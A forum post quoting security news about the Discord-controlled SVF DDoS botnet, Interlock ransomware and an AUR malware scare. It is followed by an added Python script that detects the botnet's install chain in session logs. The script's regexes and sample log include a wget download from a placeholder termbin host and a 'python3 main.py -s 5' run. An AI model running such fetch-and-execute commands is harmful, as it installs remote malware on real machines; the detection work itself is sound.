Old 23.07.2025., 06:19   #291
tomek@vz
Premium
Registration date: May 2006
Location: München/Varaždin
Posts: 4,659
A couple of bad news items, unfortunately:

Quote:
AhnLab Security Intelligence Center (ASEC) has been actively tracking cyber threats exploiting vulnerable Linux servers through strategically deployed honeypots, with SSH services using weak credentials emerging as a prime target for distributed denial-of-service (DDoS) and cryptocurrency mining actors.

In a recent incident, ASEC observed threat actors successfully infiltrating a honeypot Linux server via brute-force attacks on SSH, subsequently deploying the SVF Botnet malware.

This Python-based DDoS bot, attributed to the “SVF Team,” leverages Discord as its command-and-control (C&C) infrastructure and incorporates proxy servers to enhance attack evasion.

The installation process involves creating a virtual environment, installing dependencies like discord.py, requests, aiohttp, and lxml, followed by downloading the main.py script from a termbin URL and executing it with a server group parameter, such as “-s 5,” to facilitate grouped command execution.
> gbhackers

Quote:
CISA Warns of Interlock Ransomware With Double Extortion Tactics Attacking Windows and Linux Systems
> cybersecuritynews


Quote:
Arch Linux users told to purge Firefox forks after AUR malware scare
> TheRegister

At this point I'd say the AUR concept is perhaps a bit problematic anyway as far as security goes (like any other 3rd-party repo of any distro), but if memory serves, this isn't the first time.
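
The install chain in the quoted ASEC report (virtual environment, dependency install, termbin download, `main.py` run with `-s <group>`) can be hunted for in per-session command logs. The following is an added example, not part of the original post or of ASEC's tooling; the `session<TAB>command` log format, the function names, the stage threshold and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Packages the quoted ASEC report lists as the bot's dependencies.
BOT_DEPS = {"discord.py", "requests", "aiohttp", "lxml"}

STAGES = {
    "venv": re.compile(r"\bpython3?\s+-m\s+venv\b|\bvirtualenv\b"),
    "fetch": re.compile(r"\b(?:curl|wget)\b[^|;&]*termbin", re.I),
    "run": re.compile(r"\bpython3?\s+\S*main\.py\b[^|;&]*\s-s\s+\d+"),
}
PIP_INSTALL = re.compile(r"\bpip3?\s+install\s+([^|;&]+)")


def stages_in(command):
    """Return the install-chain stages that one command line matches."""
    hits = {name for name, rx in STAGES.items() if rx.search(command)}
    for args in PIP_INSTALL.findall(command):
        pkgs = {a.lower() for a in args.split() if not a.startswith("-")}
        if len(pkgs & BOT_DEPS) >= 3:  # most of the dependency set in one install
            hits.add("deps")
    return hits


def flag_sessions(lines, min_stages=3):
    """Group 'session<TAB>command' lines; flag sessions matching several stages."""
    seen = defaultdict(set)
    for line in lines:
        session, _, command = line.rstrip("\n").partition("\t")
        seen[session] |= stages_in(command)
    return {s: sorted(h) for s, h in seen.items() if len(h) >= min_stages}


# Constructed sample log (not from the report); the URL is a placeholder.
SAMPLE = [
    "ssh-1001\tpython3 -m venv venv && . venv/bin/activate",
    "ssh-1001\tpip install discord.py requests aiohttp lxml",
    "ssh-1001\twget https://termbin.example/PLACEHOLDER -O main.py",
    "ssh-1001\tpython3 main.py -s 5",
    "ssh-2002\tpython3 -m venv .venv",
    "ssh-2002\tpip install requests flask",
    "ssh-2002\tpython3 manage.py runserver",
]

if __name__ == "__main__":
    for session, hits in flag_sessions(SAMPLE).items():
        print(session, hits)
```

Requiring several stages per session keeps ordinary Python development (the second constructed session) from being flagged on a virtual environment or a single common package alone.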